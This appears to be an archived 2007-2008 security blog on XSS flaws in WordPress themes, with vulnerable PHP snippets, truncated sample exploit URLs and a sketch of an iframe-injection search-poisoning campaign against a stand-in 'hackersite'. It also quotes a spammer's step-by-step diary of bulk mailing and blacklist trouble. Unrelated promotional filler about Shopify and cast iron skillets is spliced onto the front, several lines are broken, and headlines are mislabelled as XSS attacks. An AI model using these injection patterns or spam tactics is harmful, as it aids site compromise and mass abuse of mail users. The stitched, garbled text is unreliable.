It's About Security
2007-2008 XSS NEWS


XSS News Blog

The content below is from the site's 2007-2008 archived pages as well as from more recent outside sources.

~~~~~

Boy, have there been changes on the web since 2007. But almost fifteen years later WordPress sites still have issues. Cross-site scripting (XSS) remain a major attack vector in the web security sphere. And year after year these attacks still make headlines. Just take a look at the headlines for some recent cross-site scripting attacks in the news:
Gitlab patches critical RCE bug in latest security release
by Jessica Haworth 01 July 2022 at 13:26 UTC
Australia’s Monash University launches public bug bounty program
by James Walker 04 July 2022 at 14:28 UTC
Business email platform Zimbra patches memcached injection flaw that imperils user credentials
by Adam Bannister 16 June 2022 at 11:04 UTC
Researcher goes public with WordPress CSP bypass hack
by John Leyden 01 June 2022 at 16:40 UTC

As of 2017 the Five Common WordPress Security Issues

  • Brute Force Attacks. ...
  • File Inclusion Exploits. ...
  • SQL Injections. ...
  • Cross-Site Scripting (XSS) ...
  • Malware. ...
  • Weak Passwords. ...
  • Not Updating WordPress, Plugins or Themes. ...
  • Using Plugins and Themes from Untrustworthy Sources.

Nevertheless many sites still use WordPress. Although WordPress is very popular, most site owners need extra help from webmasters who are proficient in WordPress to help them with plug ins and other issues. Take for example Zendesk, a help desk platform. It’s a robust piece of software with a lot of options for customizing. Understanding how it works is only part of the equation. A company also needs to know how it can work for their business. First of all know that Zendesk Support for WordPress allows you to bring your help desk, powered by Zendesk onto your blog or website. But for it to be a smooth transition most companies often opt to hire experts in Zendesk support and customization. An expert can help you setup all the great features Zendesk has to offer. In 2007 a platform like Zendesk didn't exist. Instead we were working on web security and such.

I have a friend who recently created a website for his cast iron housewares product line. He considered a Wordpress platform but eventually went with Shopify. His reasoning was that Shopify is cheaper overall. Although Shopify has plans that range from $29/month – $299/month, they include everything one needs. WordPress is free to use, but then one has to pay separately for the hosting, themes, and plugins. Shopify is better for his sales-focused cast iron cookware business. He needed/wanted an easy-to-use, full-featured and relatively automated e-commerce solution and Shopify satisfied that need.

If you want to see some fantastic looking cast iron skillets, look at this versatile 9" pan. It's like a little piece of art that can cook anything from a traditional steak or eggs to apple pie. The cast iron skillet's handle blew me away. It is meticulously sculpted in the shape of a cherry branch but is economically designed to accommodate both left and right handed cooks. Its longer length makes for better balance. The interiors of the Nest Homeware cast iron cookware are machined smooth and then pre-season our cast iron cookware with two rounds of organic flaxseed oil which makes for an incredible cooking experience. And the color, a lustrous bronzy hue, resulting from the pre-seasoning temperature of 425º F, results in a color that makes all of his cook ware stand apart from other cast iron cookware. In use, this color will change, deepening and darkening over time as layers of seasoning build, eventually reaching a rich black. I love to cook so I can appreciate all his cast iron products from the small 4.5" skillets to the 9" skillet, to the braising pan and dutch oven with their respective tops. I just wish I could afford them!


So far he is happy with choosing Shopify. He has had any security issues or Cross-Site Scripting (XSS).

Another friend who was helping a Connecticut brick and mortar eyeglasses store set up their first website had Cross-Site Scripting (XSS) issues with their Wordpress site. In hind sight it was obvious that WordPress still needed to work on security and it still has issues! The new site immediately was hit with inappropriate attempts to login from unknown ips, and eventually the site was hacked and had to be reinstalled. Wondering if there were a legal remedy for this security issue, he called on his lawyer friend who pointed out the disclaimer he had agreed to when downloading the free software. Apparently Wordpress is immune from any kind of legal liability when you use their product, even though there are definitely some security issues with it. Even a decade later some things never change or perhaps have to keep changing which is what that store recognized. They decided to go with a custom CMS built site. It allowed them more flexibility in showcasing their vast number of products from all the top brands as well as create a separate section that focused on some custom products. They have so far never been hacked.

Another friend



2007 POSTS

I plan to post here a bunch of web security news (mostly XSS).
Hopefully somebody will find this blog interesting :)

Posted by admin on 6 June 2007

 

2007 POSTS

Wordpress default theme XSS

There is an XSS in the default theme from Wordpress. However, it only works if the admin is logged in.
Filename functions.php

PHP Show Plain Code]:
  1.  

  2.  
  3.  
  4.  

$_SERVER[’REQUEST_URI’] is directly echoed to the user.

http://www.example.com/wp-admin/themes.php?page=functions.php&zmx”>

Sample exploit URL

 

Posted by admin on 8 June 2007

 

+++

XSS in Wordpress themes

BlogSecurity posted some information about common vulnerabilities found in WordPress themes.
Basically they are using insecurely $_SERVER variables such as $_SERVER[’PHP_SELF’].

Here is an example from my theme AndyBlue, which was also vulnerable.
Filename searchform.php

PHP [Show Plain Code]:
  1.  
  2.  

http://www.example.com/index.php/“>

Sample exploit URL

However, PHP_SELF is just one of the variables that should be considered. There are others.
Here is a list. There may be others, these are the ones I know about. These variables should be used with caution.

  • PHP_SELF
  • REQUEST_URI
  • SCRIPT_URL
  • SCRIPT_URI

Here is an example from another extension, Vistered-Little. This time, they are not using PHP_SELF, but REQUEST_URI.

The problem is in the file 404.php

PHP [Show Plain Code]:
  1. function selfURL() { $s = empty($_SERVER["HTTPS"]) ? ” : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
     return$protocol."://".$_SERVER[‘HTTP_HOST’].$port.$_SERVER[‘REQUEST_URI’]; } function strleft($s1, $s2) { return substr($s1, 0, 
    strpos($s1, $s2)); }print(selfURL());

http://www.example.com/index.php?error=404&

Sample exploit URL

Because the problem is in 404.php, we need to call the 404 error page and then inject the script in the URL.
So, the same problem, just a different variation. $_SERVER variables cannot be trusted.

These XSS vulnerabilities from Wordpress allow PHP code execution if you manage to get a administrator to click your link. So, after that it’s game over.

These are just two examples, a lot of Wordpress themes are vulnerable to this type of issue.

 

Posted by admin on 7 June 2007 

 

+++

cordobo-green-park theme

Another XSS in cordobo-green-park theme.
Filename blogroll.php

PHP [Show Plain Code]:
  1.  
  2.  

http://www.example.com/wp-content/themes/
cordobo-green-park/blogroll.php/”>

Sample exploit URL

 

Posted by admin on 7 June 2007 Filed in

 

+++

PHP Abstract Episode 1 - PHP Security Tips

The Zend guys have started a PHP podcast. The first episode is related with PHP security.
They have invited Eli White (the PHP guru from digg). Eli is talking about XSS (cross site scripting) and CSRF (cross site request forgery). Interesting episode.

 

Posted by admin on 6 June 2007

 

 

++++++++

2008 POSTS

kisview 0.2

March 30th, 2008

Implemented a few more stuff into kisview (some fixes, parse Windows anouncement packets, silently resolve IP addresses, …).

Tags: kisview
Posted

BlackHat Europe 2008

March 30th, 2008

Black Hat Europe 2008 Media Archives are online. Worth checking out.

Posted

Wordpress 2.5 - nice security improvements

March 30th, 2008

Wordpress 2.5 was released and it has a bunch of important security improvements.
Quoting from the release post:

Salted passwords — we now use the phpass library to stretch and salt all passwords stored in the database, which makes brute-forcing them impractical. If you use something like mod_auth_mysql we’ve created a plugin that will allow you to use legacy MD5 hashing. (The hashing is completely pluggable.) Users will automatically switch to the more secure passwords next time they log in.

Secure cookies — cookies are now encrypted based on the protocol described in this PDF paper. which is something like user name|expiration time|HMAC( user name|expiration time, k) where k = HMAC(user name|expiration time, sk) and where sk is a secret key, which you can define in your config.

// Change SECRET_KEY to a unique phrase.  You won’t have to remember it later,
// so make it long and complicated.  You can visit https://www.grc.com/passwords.htm
// to get a phrase generated for you, or just make something up.
define(’SECRET_KEY’, ‘put your unique phrase here’); // Change this to a unique phrase.

You need to set your SECRET_KEY from wp-config.php

$wpdb->prepare() — now almost all of the SQL in WordPress is prepared first, and the same functions are available to your plugins. This should prevent elementary SQL escaping issues.

That should solve a few problems. Nice work:)


On related news, there is a wordpress 2.3.3 zero-day currently being exploited. It seems to be an automated attack. It creates the directory /wp-content/1. The current exploit counter is 23,000 and still growing.

 

Posted

Diary of A New Mailer

March 24th, 2008

Here is an interesting read: some guys are starting in the mailing/spamming business and they are telling their story step by step. Found this thread on the wickedfire forums. don’t want to refer the article directly, just go to wickedfire.

Here are a few excerpts from their “experience”:

okay, this thread will be about my journey into email marketing.

We bought
–5 user license from STEDB
–2 C-Blocks,3 servers, two mailers and 1 database server from Big Sky - we are colocating with them as well.
–a boatload of data from Eclipse
–500 domain names from Moniker (com’s and net’s)

SYSTEM UPDATE: our servers are up, we have gone through our initial training on STEDB, loaded our names, and started building out campaigns. We will be mailing campaigns starting tomorrow. In my next post, I will talk about our testing strategy (and hopefully get some feedback if it makes any sense!)

Our strategy is to send 250k emails out over a 5 day period to twenty different offers to begin our process of sorting winners that we will then mail out to our entire list. So, each day we are going to send 50K to each. In the next week, we will take the most profitable (top five probably) and get them mailed out to the entire list. One of the first challenges we have ran into is how to make sure that we do not over mail any one address. We have 11mm unique emails we are starting with, but there is a concern that we may not be getting the best distribution across our entire list.

Well, day 1 was complete. We send out only 1mm messages as we wanted to test out some various ads to see which one we would go with. (see previous post about our testing method). On first thought, I believe our sample size is too low. We went with 50K messages to the same offer over 5 days. Well, the clicks off 50K messages are so small that it is really to hard to make any true decisions on the sales side. So, we are going to up that to 500K per offer, test less offers.

Out of the gate we ran into some problems with our mail servers, which STEDB quickly fixed. It was exciting to see mail go out the door.

Our hard bounce rate wasn’t so bad, about 13%, which on review and discussion with others is great. Anything below 20% on a first mailing and you are clear.

the Soft bounce rate was a higher than we expected and all over the map. sometimes we would have 40K+ delivered in a 50K sample, other times we would only get 10K in (delivered can also mean junk folder).

The data we are going to look at tonight to prune the list is the ratio of opens, unsubs from our list, and click throughs. I will give a more detailed update at the end of the week.

Day 3, fun and games continue! We changed our strategy today, sending out 1M email to 4 offers. Tommorrow, we will send out 2M emails to 4 offers, and friday, we are going to try and push 2M email to one offer. So far, here is an example of what we are doing

(this one launched 12 hours ago)

To Send = 269000
Delivered = 155000
Defered =100000
Bounced = 14000
Opens = 662
Clicks = 167
Unsubs = 58
Sales = 2

These are general internet mailings, with using approved creative and sub lines from the affiliates (working with recos from azoogle, neverblue, copeac)

Now, the clicks are split 60/40 between the actual offer and the offer unsub link, in this case we only have about 96 folks who really looked at the deal.

I was really suprised at the total number of unsubs (ours + the offers) relative to the clicks. I thought it would be high, but in reality it is equal if not greater.

Obviously alot of those Delivered are getting in the junk folder instead. I am estimating in this case maybe only 20,000 of the the ToSend are actually in the inbox (going of an number of expecting 15 clicks per thousand delivered in the inbox).

So, we pushed out 1.7M emails today to one offer to get a sense for what larger numbers would produce. We pulled out comcast, att, rr, etc. so we where left with only small ISP and true general interent (so we thought).

I excluded rr.com in my email domains. Of course, road runner ends in that, but the whole domain is something very different! I did not think to ask about wild cards until that very moment! (STEDB does have wild cards, to exclude all rr.com ‘%rr.com’ will do it). Get your mistakes out of the way early!

We have finished setting up all the FBLs we can find, and will start pushing out Yahoo, AOL, etc. next week in LOW volume at first (around 500-1000 mails per ip / per ISP / per domain) around 220K to each one of them.

Our total click through is still not great. On the mailing this morning it looked like this:

to send = 1.77M
deffered = 600K (almost all road runner)
bounced ~170k (first mailing against this list segment, so happy with this)
delivered ~ 1M
Opened - 5300
clicked - 614 (split 50/50 between the offer and the offer unsub)
Unsub - 65

We got an email in our notprocess folder the past two days from a company that has blacklisted us. the message starts with

“Remain calm! Please read all of this message before acting.

We have received mail from your site that our system thinks is junk
mail, because it was sent to a `spambait’ address. We have therefore
made an entry for you in our blacklist for the offending system’s IP…”

Of course, they have whacked with the header so we cannot tell which email address is was. Fun! What investigative process do you use to find folks like this?

 

Posted

Interesting attacks using XSS

March 18th, 2008

There were some interesting attacks in the past days. All of them are exploiting XSS (cross site scripting) vulnerabilities.
I’ve been discussing my colleagues about them and here is what I think is happening:

1. Some hacker(s) finds a bunch of vulnerable websites (that’s easy, there are a lot of vulnerable websites or if you are lazy just take them from here).

2. Prepare a list of URLs with XSSes included in the URL. Something like
http://www.somewebsite.com/vulnerablescript.php?q=some+popular+words+and+iframe+src=hackersite strong=""

3. Prepare a page with browser exploits or just old tricks (like a neverending popup storm - A common use will never figure out how to excape from it and at some point will get tired on clicking No/Cancel and just click Open)

4. Post the XSS URLs on a bunch of blogs (think Blogspot = Google) and wait for google to index them.

5. Profit (When users will search for your popular words, the indexed XSSes will appear in the search results). /iframe+src=hackersite

Pretty interesting usage of XSS.


XSSNews.com